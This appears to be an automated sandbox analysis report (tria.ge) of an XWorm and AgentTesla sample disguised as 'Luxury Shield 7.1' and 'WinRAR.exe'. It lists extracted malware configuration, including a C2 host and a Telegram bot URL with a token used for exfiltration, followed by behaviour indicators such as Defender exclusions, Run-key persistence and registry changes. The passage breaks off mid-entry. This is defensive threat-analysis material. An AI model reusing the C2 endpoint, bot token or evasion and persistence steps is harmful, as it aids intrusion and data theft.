Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
1800s -
max time network
1799s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
08/08/2024, 06:50
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://mega.nz/folder/o7onBAqb#lPnM6du1_ZsHQgf5SIaC4Q
Resource
win10v2004-20240802-en
General
-
Target
https://mega.nz/folder/o7onBAqb#lPnM6du1_ZsHQgf5SIaC4Q
Malware Config
Extracted
xworm
3.1
society-painted.at.ply.gg:17251
-
Install_directory
%Public%
-
install_file
USB.exe
-
telegram
https://api.telegram.org/bot5817418329:AAGYtFww9eAGl3ZTuqrCmSNxu_TJJiAWkzA/sendMessage?chat_id=1860651440
Extracted
xworm
5.0
127.0.0.1:7000
oRS7BxRwxp3BS0Q4
-
install_file
USB.exe
Extracted
xworm
127.0.0.1:7000
-
install_file
USB.exe
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Detect Xworm Payload 6 IoCs
resource yara_rule behavioral1/files/0x00090000000235c1-284.dat family_xworm behavioral1/memory/5928-292-0x0000000000A70000-0x0000000000AAE000-memory.dmp family_xworm behavioral1/files/0x000b00000002364d-11430.dat family_xworm behavioral1/files/0x0009000000023654-11440.dat family_xworm behavioral1/memory/4536-22122-0x000000000DAD0000-0x000000000DAE4000-memory.dmp family_xworm behavioral1/memory/1448-22236-0x0000000000400000-0x0000000000414000-memory.dmp family_xworm -
AgentTesla payload 1 IoCs
resource yara_rule behavioral1/memory/444-11401-0x000001F94D1F0000-0x000001F94D3E4000-memory.dmp family_agenttesla -
Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 5428 powershell.exe 5260 powershell.exe 5388 powershell.exe 5768 powershell.exe 68 powershell.exe 5536 powershell.exe 5652 powershell.exe 5340 powershell.exe 5900 powershell.exe 372 powershell.exe 1804 powershell.exe 2376 powershell.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation WinRAR.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation Luxury Shield 7.1.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation Luxury Shield 7.1.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinRAR.lnk WinRAR.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinRAR.lnk WinRAR.exe -
Executes dropped EXE 45 IoCs
pid Process 5628 Luxury Shield 7.1.exe 5928 WinRAR.exe 4144 Luxury Shield 7.1.exe 5680 WinRAR.exe 2312 Luxury Shield 7.1.exe 3788 WinRAR.exe 2192 WinRAR.exe 5608 Luxury Shield 7.1.exe 5696 WinRAR.exe 4976 WinRAR.exe 5852 WinRAR.exe 5688 WinRAR.exe 1704 WinRAR.exe 2472 WinRAR.exe 2304 Progman.exe 444 XWorm.exe 3896 WinRAR.exe 4656 WinRAR.exe 1820 WinRAR.exe 800 WinRAR.exe 4536 Luxury Shield 7.1.exe 5272 WinRAR.exe 3468 WinRAR.exe 5068 Luxury Shield 7.1.exe 5032 WinRAR.exe 5856 WinRAR.exe 3500 WinRAR.exe 2332 WinRAR.exe 4856 WinRAR.exe 1920 WinRAR.exe 4740 WinRAR.exe 1792 WinRAR.exe 4648 WinRAR.exe 3136 nexusv2.exe 1448 nexusv2.exe 3396 WinRAR.exe 2324 WinRAR.exe 3204 WinRAR.exe 5132 WinRAR.exe 5908 WinRAR.exe 5572 WinRAR.exe 6040 WinRAR.exe 5572 WinRAR.exe 2656 WinRAR.exe 3468 WinRAR.exe -
Loads dropped DLL 2 IoCs
pid Process 2312 Luxury Shield 7.1.exe 4536 Luxury Shield 7.1.exe -
Obfuscated with Agile.Net obfuscator 33 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
resource yara_rule behavioral1/memory/2312-421-0x000000000B780000-0x000000000B9CC000-memory.dmp agile_net behavioral1/memory/2312-465-0x000000000B780000-0x000000000B9C8000-memory.dmp agile_net behavioral1/memory/2312-477-0x000000000B780000-0x000000000B9C8000-memory.dmp agile_net behavioral1/memory/2312-483-0x000000000B780000-0x000000000B9C8000-memory.dmp agile_net behavioral1/memory/2312-487-0x000000000B780000-0x000000000B9C8000-memory.dmp agile_net behavioral1/memory/2312-485-0x000000000B780000-0x000000000B9C8000-memory.dmp agile_net behavioral1/memory/2312-479-0x000000000B780000-0x000000000B9C8000-memory.dmp agile_net behavioral1/memory/2312-475-0x000000000B780000-0x000000000B9C8000-memory.dmp agile_net behavioral1/memory/2312-473-0x000000000B780000-0x000000000B9C8000-memory.dmp agile_net behavioral1/memory/2312-471-0x000000000B780000-0x000000000B9C8000-memory.dmp agile_net behavioral1/memory/2312-469-0x000000000B780000-0x000000000B9C8000-memory.dmp agile_net behavioral1/memory/2312-467-0x000000000B780000-0x000000000B9C8000-memory.dmp agile_net behavioral1/memory/2312-463-0x000000000B780000-0x000000000B9C8000-memory.dmp agile_net behavioral1/memory/2312-461-0x000000000B780000-0x000000000B9C8000-memory.dmp agile_net behavioral1/memory/2312-459-0x000000000B780000-0x000000000B9C8000-memory.dmp agile_net behavioral1/memory/2312-457-0x000000000B780000-0x000000000B9C8000-memory.dmp agile_net behavioral1/memory/2312-455-0x000000000B780000-0x000000000B9C8000-memory.dmp agile_net behavioral1/memory/2312-453-0x000000000B780000-0x000000000B9C8000-memory.dmp agile_net behavioral1/memory/2312-451-0x000000000B780000-0x000000000B9C8000-memory.dmp agile_net behavioral1/memory/2312-447-0x000000000B780000-0x000000000B9C8000-memory.dmp agile_net behavioral1/memory/2312-445-0x000000000B780000-0x000000000B9C8000-memory.dmp agile_net behavioral1/memory/2312-441-0x000000000B780000-0x000000000B9C8000-memory.dmp agile_net behavioral1/memory/2312-439-0x000000000B780000-0x000000000B9C8000-memory.dmp agile_net behavioral1/memory/2312-433-0x000000000B780000-0x000000000B9C8000-memory.dmp agile_net behavioral1/memory/2312-430-0x000000000B780000-0x000000000B9C8000-memory.dmp agile_net behavioral1/memory/2312-481-0x000000000B780000-0x000000000B9C8000-memory.dmp agile_net behavioral1/memory/2312-449-0x000000000B780000-0x000000000B9C8000-memory.dmp agile_net behavioral1/memory/2312-443-0x000000000B780000-0x000000000B9C8000-memory.dmp agile_net behavioral1/memory/2312-437-0x000000000B780000-0x000000000B9C8000-memory.dmp agile_net behavioral1/memory/2312-435-0x000000000B780000-0x000000000B9C8000-memory.dmp agile_net behavioral1/memory/2312-431-0x000000000B780000-0x000000000B9C8000-memory.dmp agile_net behavioral1/files/0x0007000000023601-11341.dat agile_net behavioral1/memory/444-11398-0x000001F92F7C0000-0x000001F932A38000-memory.dmp agile_net -
resource yara_rule behavioral1/files/0x00080000000235fe-11319.dat upx behavioral1/memory/2304-11335-0x0000000140000000-0x00000001407A1000-memory.dmp upx -
Uses the VBS compiler for execution 1 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinRAR = "C:\\Users\\Public\\WinRAR.exe" WinRAR.exe -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
pid Process 5628 Luxury Shield 7.1.exe 4144 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 5608 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 444 XWorm.exe 2312 Luxury Shield 7.1.exe 444 XWorm.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 2312 Luxury Shield 7.1.exe 4536 Luxury Shield 7.1.exe 4536 Luxury Shield 7.1.exe 4536 Luxury Shield 7.1.exe 4536 Luxury Shield 7.1.exe 4536 Luxury Shield 7.1.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3136 set thread context of 1448 3136 nexusv2.exe 220 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Progman.exe XWorm V5.3.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 1500 2312 WerFault.exe 136 -
System Location Discovery: System Language Discovery 1 TTPs 19 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Luxury Shield 7.1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Luxury Shield 7.1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Luxury Shield 7.1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nexusv2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Luxury Shield 7.1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Luxury Shield 7.1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Luxury Shield 7.1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DllHost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DllHost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nexusv2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 nexusv2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier nexusv2.exe -
Enumerates system info in registry 2 TTPs 10 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS nexusv2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSVersion nexusv2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSReleaseDate nexusv2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName nexusv2.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS XWorm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer XWorm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion XWorm.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Software\Microsoft\Internet Explorer\TypedURLs XWorm.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 XWorm.exe Set value (data) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 010000000000000002000000ffffffff msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 010000000200000000000000ffffffff Luxury Shield 7.1.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9 Luxury Shield 7.1.exe Set value (data) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202020202 msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 msedge.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\MRUListEx = 00000000ffffffff XWorm.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\0\0 XWorm.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\2\0 XWorm.exe Set value (int) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\0 = 8400310000000000085919371100444f574e4c4f7e3100006c0009000400efbe02598363085919372e0000007fe10100000001000000000000000000420000000000da374e0044006f0077006e006c006f00610064007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100370039003800000018000000 XWorm.exe Set value (data) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\0\0\0\0 = 500031000000000008591a37100049636f6e73003c0009000400efbe08591a3708591d372e00000035360200000007000000000000000000000000000000e83cf200490063006f006e007300000014000000 XWorm.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\0 msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4" Luxury Shield 7.1.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\2\0\1 Luxury Shield 7.1.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 msedge.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 XWorm.exe Set value (data) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = 00000000ffffffff XWorm.exe Set value (int) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\GroupByKey:PID = "0" XWorm.exe Set value (int) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Version = "1" Luxury Shield 7.1.exe Set value (int) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" Luxury Shield 7.1.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\SniffedFolderType = "Downloads" msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" Luxury Shield 7.1.exe Set value (int) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" Luxury Shield 7.1.exe Set value (int) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\2\0\1\NodeSlot = "11" Luxury Shield 7.1.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg Luxury Shield 7.1.exe Set value (data) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202020202 msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" Luxury Shield 7.1.exe Set value (int) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" Luxury Shield 7.1.exe Set value (data) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\2\0\0\MRUListEx = ffffffff Luxury Shield 7.1.exe Set value (data) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 010000000200000000000000ffffffff Luxury Shield 7.1.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 msedge.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259} msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" msedge.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings msedge.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell Luxury Shield 7.1.exe Set value (int) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" Luxury Shield 7.1.exe Set value (int) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\GroupView = "0" Luxury Shield 7.1.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg XWorm.exe Set value (int) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\GroupByKey:PID = "0" Luxury Shield 7.1.exe Set value (data) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 3a001f44471a0359723fa74489c55595fe6b30ee260001002600efbe1000000071beae6cd7e4da019a79482edde4da015973dd0962e9da0114000000 msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByDirection = "1" msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1" msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" XWorm.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 Luxury Shield 7.1.exe Set value (data) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\2\0\0 = 5600310000000000085924371000506c7567696e7300400009000400efbe08591a37085924372e0000000f36020000000700000000000000000000000000000042c91b0050006c007500670069006e007300000016000000 Luxury Shield 7.1.exe Set value (int) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" Luxury Shield 7.1.exe Set value (int) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1" Luxury Shield 7.1.exe Set value (data) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 Luxury Shield 7.1.exe Set value (int) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" Luxury Shield 7.1.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\0\0\0\0 XWorm.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 Luxury Shield 7.1.exe Set value (str) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Generic" Luxury Shield 7.1.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6 XWorm.exe Set value (int) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local 